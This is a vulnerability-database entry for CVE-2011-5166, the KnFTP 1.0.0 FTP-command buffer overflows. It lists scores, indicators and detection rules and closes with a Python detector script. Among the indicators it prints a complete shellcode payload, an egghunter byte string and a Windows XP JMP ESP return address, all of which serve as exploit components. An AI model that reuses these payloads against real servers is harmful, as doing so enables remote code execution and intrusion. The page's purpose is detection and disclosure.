cvebase
CVE-2011-5166
published 2012-09-15


Priority: P3 · 55 · high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit available
EPSS: 6.48% (92.9th percentile)
Multiple stack-based buffer overflows in KnFTP 1.0.0 allow remote attackers to execute arbitrary code via a long string to the (1) USER, (2) PASS, (3) REIN, (4) QUIT, (5) PORT, (6) PASV, (7) TYPE, (8) STRU, (9) MODE, (10) RETR, (11) STOR, (12) APPE, (13) ALLO, (14) REST, (15) RNFR, (16) RNTO, (17) ABOR, (18) DELE, (19) CWD, (20) LIST, (21) NLST, (22) SITE, (23) STST, (24) HELP, (25) NOOP, (26) MKD, (27) RMD, (28) PWD, (29) CDUP, (30) STOU, (31) SNMT, (32) SYST, and (33) XPWD commands.

Affected (1 range)

Vendor      Product   Version range   Fixed in
elif_keir   knftp     (not listed)    (not listed)

Detection & IOCs (extracted from sources)

filename: knftpd.exe
other: egg tag bytes \x54\x30\x30\x57\x54\x30\x30\x57 (the sources call the egg "W00T"; on the wire these bytes read as ASCII "T00WT00W")
other: JMP ESP @ 0x7C874413 (kernel32.dll)
command: USER <long_string>
command: PASS <overflow_buffer>
command: PWD <9000-byte buffer>
bytes (payload, as given in the sources):
\xb8\xe8\xaa\x5e\xc0\xdb\xd6\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x33\x31\x43\x12\x03\x43\x12\x83\x03\x56\xbc\x35\x2f\x4f\xc8\xb6\xcf\x90\xab\x3f\x2a\xa1\xf9\x24\x3f\x90\xcd\x2f\x6d\x19\xa5\x62\x85\xaa\xcb\xaa\xaa\x1b\x61\x8d\x85\x9c\x47\x11\x49\x5e\xc9\xed\x93\xb3\x29\xcf\x5c\xc6\x28\x08\x80\x29\x78\xc1\xcf\x98\x6d\x66\x8d\x20\x8f\xa8\x9a\x19\xf7\xcd\x5c\xed\x4d\xcf\x8c\x5e\xd9\x87\x34\xd4\x85\x37\x45\x39\xd6\x04\x0c\x36\x2d\xfe\x8f\x9e\x7f\xff\xbe\xde\x2c\x3e\x0f\xd3\x2d\x06\xb7\x0c\x58\x7c\xc4\xb1\x5b\x47\xb7\x6d\xe9\x5a\x1f\xe5\x49\xbf\x9e\x2a\x0f\x34\xac\x87\x5b\x12\xb0\x16\x8f\x28\xcc\x93\x2e\xff\x45\xe7\x14\xdb\x0e\xb3\x35\x7a\xea\x12\x49\x9c\x52\xca\xef\xd6\x70\x1f\x89\xb4\x1e\xde\x1b\xc3\x67\xe0\x23\xcc\xc7\x89\x12\x47\x88\xce\xaa\x82\xed\x21\xe1\x8f\x47\xaa\xac\x45\xda\xb7\x4e\xb0\x18\xce\xcc\x31\xe0\x35\xcc\x33\xe5\x72\x4a\xaf\x97\xeb\x3f\xcf\x04\x0b\x6a\xac\xcb\x9f\xf6\x1d\x6e\x18\x9c\x61
bytes (egghunter; the mov eax immediate \x54\x30\x30\x57 is the egg tag):
\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
  • Detect oversized FTP command arguments: alert on any FTP command (USER, PASS, RETR, STOR, MKD, PWD, CWD, etc.) whose argument exceeds ~271 bytes, the shellcode buffer space documented in the sources.
  • Detect the egghunter tag in FTP traffic: the doubled tag bytes \x54\x30\x30\x57\x54\x30\x30\x57 in a PASS command payload are a strong indicator of exploitation. The sources name the egg "W00T", but on the wire these bytes read as ASCII "T00WT00W", so match the byte sequence rather than the string "W00TW00T".
  • Monitor for FTP PASS commands containing large NOP sleds (\x90 repeated) followed by shellcode bytes, indicative of stack-based buffer overflow exploitation against KnFTP.
  • Flag FTP sessions sending 9000+ byte arguments to any FTP command (e.g., PWD); this is the documented crash/DoS payload size for the KnFTP SEH overwrite.
  • knftpd.exe is the only non-SafeSEH module in KnFTP; process-level monitoring for knftpd.exe spawning unexpected child processes (e.g., calc.exe, cmd.exe) indicates successful exploitation.
  • Vulnerable FTP commands include MKD, NLST (the client's ls), ABOR, CWD (the client's cd), APPE, REST and PWD; the CVE description lists 33 affected commands in total, so monitor all of them for abnormally long arguments on port 21.
  • ROP gadget addresses and .data section addresses are specific to the Windows XP SP2/SP3 Spanish and Windows 7 Professional SP1 Spanish builds of msvcrt.dll; they will not apply to other language versions or patch levels.
  • The JMP ESP EIP-overwrite address (0x7C874413 in kernel32.dll) is specific to Windows XP SP3; it will differ on other OS versions or service packs.
  • The DoS/SEH PoC was tested with DEP disabled; exploitation reliability changes when DEP is enabled (the Metasploit module specifically addresses DEP bypass via ROP).
  • The exploit overwrites EIP with smaller payloads but switches to an SEH overwrite with larger payloads; detection thresholds should account for both overflow sizes.
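The four indicators above (oversized argument, egghunter tag, NOP sled, 9000-byte SEH-range payload) as one detector run over client-to-server FTP byte streams. This is an added example, not code from the page's sources or from KnFTP; the 271-byte and 9000-byte thresholds are the ones stated above, while NOP_SLED_MIN, the Finding record, the function names and the sample sessions are constructed assumptions for illustration.

```python
"""Detector for the KnFTP 1.0.0 (CVE-2011-5166) indicators listed above.

Added example; this is not code from the page's sources or from KnFTP itself.
The 271-byte and 9000-byte thresholds come from the detection notes on this
page; NOP_SLED_MIN and the sample sessions below are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

ARG_LEN_THRESHOLD = 271       # from the page: documented shellcode buffer space
SEH_PAYLOAD_THRESHOLD = 9000  # from the page: documented SEH-overwrite/DoS size
NOP_SLED_MIN = 32             # assumption: shortest \x90 run we call a sled

# Egg tag exactly as the page gives it: \x54\x30\x30\x57 twice. Its ASCII
# rendering is "T00WT00W", so match the bytes, not the string "W00TW00T".
EGG_TAG = b"\x54\x30\x30\x57" * 2
NOP_SLED_RE = re.compile(rb"\x90{%d,}" % NOP_SLED_MIN)

# The 33 commands named in the CVE description (STST/SNMT spelled as in the CVE).
VULNERABLE_COMMANDS = frozenset("""
USER PASS REIN QUIT PORT PASV TYPE STRU MODE RETR STOR APPE ALLO REST RNFR
RNTO ABOR DELE CWD LIST NLST SITE STST HELP NOOP MKD RMD PWD CDUP STOU SNMT
SYST XPWD
""".split())


@dataclass
class Finding:
    command: str   # FTP verb the argument was sent with
    reason: str    # one of: oversized_arg, seh_range, egg_tag, nop_sled
    arg_len: int   # length of the argument in bytes


def parse_ftp_commands(stream: bytes) -> Iterator[Tuple[str, bytes]]:
    """Split a client->server FTP byte stream into (verb, argument) pairs.

    RFC 959 commands end in CRLF; a trailing fragment without CRLF is still
    yielded so an oversized final command is not silently dropped.
    """
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        yield verb.decode("ascii", "replace").upper(), arg


def check_command(verb: str, arg: bytes) -> List[Finding]:
    """Apply the page's four indicators to one command/argument pair."""
    findings = []
    n = len(arg)
    if verb in VULNERABLE_COMMANDS and n > ARG_LEN_THRESHOLD:
        findings.append(Finding(verb, "oversized_arg", n))
    if n >= SEH_PAYLOAD_THRESHOLD:
        findings.append(Finding(verb, "seh_range", n))
    if EGG_TAG in arg:
        findings.append(Finding(verb, "egg_tag", n))
    m = NOP_SLED_RE.search(arg)
    if m and m.end() < n:  # sled followed by more bytes, i.e. something to land in
        findings.append(Finding(verb, "nop_sled", n))
    return findings


def scan_session(stream: bytes) -> List[Finding]:
    """Run every command of a session through check_command."""
    return [f for verb, arg in parse_ftp_commands(stream)
            for f in check_command(verb, arg)]


# Constructed sample sessions (not captured traffic).
BENIGN_SESSION = b"USER anonymous\r\nPASS guest@example.org\r\nPWD\r\nQUIT\r\n"
EIP_SESSION = b"USER " + b"A" * 300 + b"\r\n"
EGG_SESSION = b"USER test\r\nPASS " + b"\x90" * 64 + EGG_TAG + b"\xcc" * 40 + b"\r\n"
SEH_SESSION = b"PWD " + b"A" * 9000 + b"\r\n"

if __name__ == "__main__":
    for name, session in [("benign", BENIGN_SESSION), ("eip", EIP_SESSION),
                          ("egg", EGG_SESSION), ("seh", SEH_SESSION)]:
        for f in scan_session(session):
            print(f"{name}: {f.command} {f.reason} (arg {f.arg_len} bytes)")
```

The oversized-argument check is restricted to the 33 verbs from the CVE so that a long argument to an unrelated command does not fire it, while the 9000-byte check applies to any verb, matching the caveat that the exploit switches from an EIP overwrite to an SEH overwrite as payload size grows.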